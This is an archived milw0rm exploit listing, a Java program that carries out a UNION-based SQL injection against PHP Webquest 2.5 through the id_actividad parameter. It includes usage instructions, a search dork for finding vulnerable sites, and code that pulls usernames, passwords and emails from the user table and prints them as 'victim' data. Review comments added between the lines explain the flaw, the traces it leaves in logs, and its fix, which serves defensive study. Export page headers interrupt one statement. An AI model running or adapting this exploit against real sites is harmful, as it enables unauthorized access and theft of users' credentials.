PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit

  1    /*
  2     * script name         : phpwebquest
  3     * script version : 2.5
  4     * script website : http://phpwebquest.org
  5     * Bug Finder       : D4real_TeaM (’unkn0wnX’,’n3t−mapper’,’ToxiC350’);
  6     * injected file    : webquest/soporte_derecha_w.php
  7     * Variable         : id_actividad
  8     * Contact          : n3t−mapp3r [At] hotmail [dot] com,is14m [At] hotmail [dot] com,ushermehdi350 [At] hotmail [dot]
       com
  9     *
  10    * Usage:
  11    *          First you must have a JDK 1.4 or more to compile the code
  12    *          Compiling: javac −nowarn −g:none SqInjection.java
  13    *          Usage: java SqInjection host_name /path/to/script/
  14    * Dork : inurl:/webquest/soporte_derecha_w.php?
  15    *
  16    * GreetZ : s4udi−s3curity−terror, Spy−Boy, R3mix−boY, Dchach−X, DiaboliC4, j4v4k, Hitch4w4, Und34d and all Moroccan,
       arab hackerS
  17    * Sp.Greetz : s0crateX ;)
  18    */
  19
  20
  21   import java.io.*;
  22   import java.net.* ;
  23   public class SqInjection {
           // Review notes (defender's reading of this listing).
           // The class sends one HTTP request to webquest/soporte_derecha_w.php and appends a
           // UNION SELECT to the id_actividad query parameter; the returned page is then scanned
           // for the table cell that carries the injected column.
           // The appended query reads usuario, password and e_mail from the usuario table, so a
           // deployment that answered such a request should treat those account records as
           // disclosed. Whether the password column holds a hash or clear text is not visible here.
           // The server-side query is not shown on this page; presumably id_actividad reaches it
           // unquoted and unvalidated (the payload contains no quote character) - confirm against
           // the application source. Binding the value as a query parameter, or casting it to an
           // integer before use, closes this class of flaw.
  24
           // Entry point. argv[0] is host or host:port (port defaults to 80), argv[1] is the path
           // under which the application is installed. Leaves through System.exit on a wrong
           // argument count, an unparsable port, an unexpected status line or an IOException.
  25       public static void main(String[] argv) {
  26           Socket lhlawa;
               // bachT3tih is the SQL suffix appended to the parameter: a five-column UNION whose
               // last column is usuario, password and e_mail joined with 0x3a (':').
  27           String hName,tra9,bachT3tih=" union select 1,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail) from usuario";
               // lmarsa is the TCP port; it stays 80 unless argv[0] supplies one.
  28           int lmarsa=80;
  29           BufferedReader _______dakhl;PrintWriter _______kharj;
  30           if(argv.length!=2){
  31                System.out.println("Error: args not properly defined");
  32                System.exit (−1);
  33           }
               // Exactly one ':' in argv[0] separates host and port; any other shape is taken as
               // the host name as given.
  34           String zgawa[]=argv[0].split(":");
  35           if(zgawa.length==2){
  36                hName=zgawa[0];
  37                try{
  38                    lmarsa=Integer.parseInt(zgawa[1]);
  39                }catch(NumberFormatException ex){
  40                    System.out.println("Error: Invalid Port");System.exit(0);
  41                }
  42           }else{
  43                hName=argv[0];
  44           }
               // tra9 is the installation path that is placed in front of /webquest/ in the request.
  45           tra9=argv[1];
  46           System.out.print("Connecing to: "+hName);
  47           try{
  48                lhlawa=new Socket(hName,lmarsa);
  49               System.out.println("\t\t[ OK ]");
                   // taya7Jdo is the raw request text. The parameter value is a negative id followed
                   // by the URL-encoded suffix and a trailing "/*". In a web-server access log this
                   // appears as a GET for soporte_derecha_w.php whose id_actividad is not a plain
                   // integer and contains "union" and "select" joined by '+' (URLEncoder's encoding
                   // of a space).
  50               String in3alBoh="",taya7Jdo="GET /"+tra9+"/webquest/soporte_derecha_w.php?id_actividad=−1"+URLEncoder.encode(bachT3tih
                   // NOTE(review): the next two lines are a page footer and a page header from the
                   // document export, not program text; the statement continues on the line after them.
D4real_TeaM                                                                                                                    09/14/2007
                         PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit                                            Page 2/2
       )+"/* HTTP/1.1\n";
                      // Only a Host and a Connection header are sent, and every line ends in a bare
                      // "\n" instead of CRLF; both traits are visible in a capture of this request.
  51                  taya7Jdo+="Host: "+hName+"\n";
  52                  taya7Jdo+="Connection: Close\n\n";
  53                  _______kharj=new PrintWriter(lhlawa.getOutputStream());
  54                  _______dakhl=new BufferedReader(new InputStreamReader( lhlawa.getInputStream()));
  55                  _______kharj.print(taya7Jdo);
  56                  _______kharj.flush();
                      // The first response line must equal "HTTP/1.1 200 OK" (compared without regard
                      // to case); any other status line ends the program.
  57                  String line=_______dakhl.readLine();
  58                  if(line.equalsIgnoreCase("HTTP/1.1 200 OK")==false){
  59                      System.out.println("Error:Invalid HTTP protocol");System.exit(0);
  60                  }
                      // Skip the response headers up to the first empty line, then collect every
                      // following line into in3alBoh (the response body).
  61                  boolean ok=false;
  62                  while((line=_______dakhl.readLine())!=null){
  63                      if(ok==false){
  64                          if(line.length()==0)
  65                              {ok=true;
  66                              }
  67                      }
  68                      else in3alBoh+=line+"\n";
  69                  }
  70                  _______kharj.close();
  71                  _______dakhl.close();
  72                  parseData(in3alBoh);
  73            }catch(IOException ex){
  74                  System.out.println("\nSocket Error program will exit");
  75                  System.exit(0);
  76            }
  77        }
            // Scans the response body for the first line that, once trimmed, starts with
            // <td width="97%">, drops that 16-character prefix and the last four characters, splits
            // the remainder on ':' and prints the first three pieces as user name, password and
            // e-mail. If no line matches, tmp still refers to the response lines and the first three
            // of those are used instead.
  78        private static void parseData(String haHwaJay){
  79            String uName,passwd,mail,tmp[];
  80            tmp=haHwaJay.split("\n");
  81            for(int i=0;i<tmp.length;i++)
  82            {
  83                  if(tmp[i].trim().startsWith("<td width=\"97%\">"))
  84                  {
  85                      String safiTa7=tmp[i].trim().substring(16,tmp[i].trim().length()−4);
                          // tmp is reused here: from this point it holds the ':'-separated fields.
  86                      tmp=safiTa7.split (":");
  87                      break;
  88                  }
  89            }
  90            uName=tmp[0];passwd=tmp[1];mail=tmp[2];
  91            System.out.println("*************************** Informations about the victim ***************************");
  92            System.out.println("User Name: "+uName+"\nPassword: "+passwd+"\nVictimz mail: "+mail);
  93        }
  94   }
  95
  96   # milw0rm.com [2007−09−14]



